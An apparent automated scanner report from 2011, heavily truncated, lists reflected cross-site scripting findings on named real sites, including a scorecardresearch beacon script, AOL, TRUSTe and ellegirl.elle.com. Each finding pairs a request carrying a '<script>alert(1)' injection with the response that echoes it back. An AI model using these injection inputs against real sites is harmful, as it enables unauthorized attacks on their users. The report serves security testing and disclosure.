HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:38 GMT Date: Sat, 17 Sep 2011 16:23:38 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=249914<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:28:32 GMT Date: Sat, 17 Sep 2011 16:28:32 GMT Content-Length: 1240 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"249914<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:54:19 GMT Date: Sat, 17 Sep 2011 16:54:19 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16122", c5:"44988", c6:"", c10:"237868e4c54<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:36:32 GMT Date: Sat, 17 Sep 2011 16:36:32 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8b174<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:34:58 GMT Date: Sat, 17 Sep 2011 16:34:58 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"3", c2:"6036156bb21d<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:34:59 GMT Date: Sat, 17 Sep 2011 16:34:59 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"3", c2:"6036156", c3:"583998898bb8<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:01 GMT Date: Sat, 17 Sep 2011 16:35:01 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... comscore;for(b=a.length-1 COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708fcab9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:02 GMT Date: Sat, 17 Sep 2011 16:35:02 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... a.length-1;b>=0;b--){f COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135ad03d<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8- |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:03 GMT Date: Sat, 17 Sep 2011 16:35:03 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135", c6:"9597a<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://c.aol.com |
Path: | /read/_topic_stats |
GET /read/_topic_stats?ids= Host: c.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:37:26 GMT Server: Apache-Coyote/1.1 Content-Type: application/json;charset Set-Cookie: gcp.dirty=true; Expires=Sat, 17-Sep-2011 17:42:26 GMT; Path=/ Content-Length: 203 jsonp1316296586533522e9<script>alert(1)< "status" : "OK", "http://nai.glb.adtechus "comments" : -1 } }); |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:40:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5492 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... ivName:"te-clr1-04c957cd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:39:54 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5574 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... <a style="color:#456d88;text ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:41:02 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5492 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... _clr1_960d0403_4ed5_48db ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cm.npc-hearst |
Path: | /js_1_0/ |
GET /js_1_0/?config Host: cm.npc-hearst.overture Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BX=228g5ih765ieg&b=3&s=bh |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:16 GMT P3P: policyref="http://info Set-Cookie: UserData=02u3hs9yoaL Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3421 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <base target="_top"> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... <link rel="stylesheet" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | / |
GET /?b1903</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Vary: Accept-Encoding Content-Length: 66350 Content-Type: text/html; charset=UTF-8 Date: Sat, 17 Sep 2011 16:32:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... = ''; s.prop2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:hp'; s.prop7 = 'eg:hp'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/?b1903</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:hp'; s.evar7 = 'eg:hp'; s.evar8 = document.location.href; /************* DO NOT ALTER ANYTHING BELOW T ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content9ca0b</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:12 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30545 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:16 GMT Date: Sat, 17 Sep 2011 16:33:16 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content9ca0b</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins3febf</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:44 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30545 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:48 GMT Date: Sat, 17 Sep 2011 16:34:48 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins3febf</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:13 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30544 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:17 GMT Date: Sat, 17 Sep 2011 16:36:17 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ent.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:37 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30545 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:41 GMT Date: Sat, 17 Sep 2011 16:37:41 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... e; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.locatio ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:38:53 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30544 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:38:56 GMT Date: Sat, 17 Sep 2011 16:38:56 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... op5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*********** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content967ca</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:33:04 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30530 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:33:08 GMT Date: Sat, 17 Sep 2011 16:33:08 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... 2 = ''; //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content967ca</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/pluginsf128e</script><script Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:34:40 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30530 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:34:43 GMT Date: Sat, 17 Sep 2011 16:34:43 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... //s.prop3 = ''; s.prop3 = document.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/pluginsf128e</script><script //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:36:15 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30530 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:36:17 GMT Date: Sat, 17 Sep 2011 16:36:17 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... ent.title; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 X-Pingback: http://ellegirl.elle.com Last-Modified: Sat, 17 Sep 2011 16:37:50 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 30530 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 17 Sep 2011 16:37:54 GMT Date: Sat, 17 Sep 2011 16:37:54 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... e; s.prop4 = ''; s.prop5 = ''; s.prop6 = 'eg:misc'; s.prop7 = 'eg:misc'; s.prop8 = document.location.href; s.evar1 = ''; s.evar2 = '/wp-content/plugins //s.evar3 = ''; s.evar3 = document.title; s.evar4 = ''; s.evar5 = ''; s.evar6 = 'eg:misc'; s.evar7 = 'eg:misc'; s.evar8 = document.location.href; /*** ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: ellegirl.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
